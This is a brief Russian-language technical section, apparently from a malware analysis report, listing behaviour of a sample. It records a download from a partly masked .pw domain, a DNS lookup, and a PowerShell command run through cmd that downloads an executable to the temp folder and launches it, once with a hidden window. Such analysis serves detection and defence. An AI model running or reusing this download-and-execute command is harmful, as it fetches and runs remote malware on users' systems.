Техническая информация
- http://to###ikotoko.pw/jauz.exe как %temp%\tram.exe
- '<SYSTEM32>\cmd.exe' /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://to###ikotoko.pw/jauz.exe','%temp%\tram.exe');start %temp%\tram.exe
- DNS ASK to###ikotoko.pw
- '<SYSTEM32>\cmd.exe' /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://to###ikotoko.pw/jauz.exe','%temp%\tram.exe');start %temp%\tram.exe' (со скрытым окном)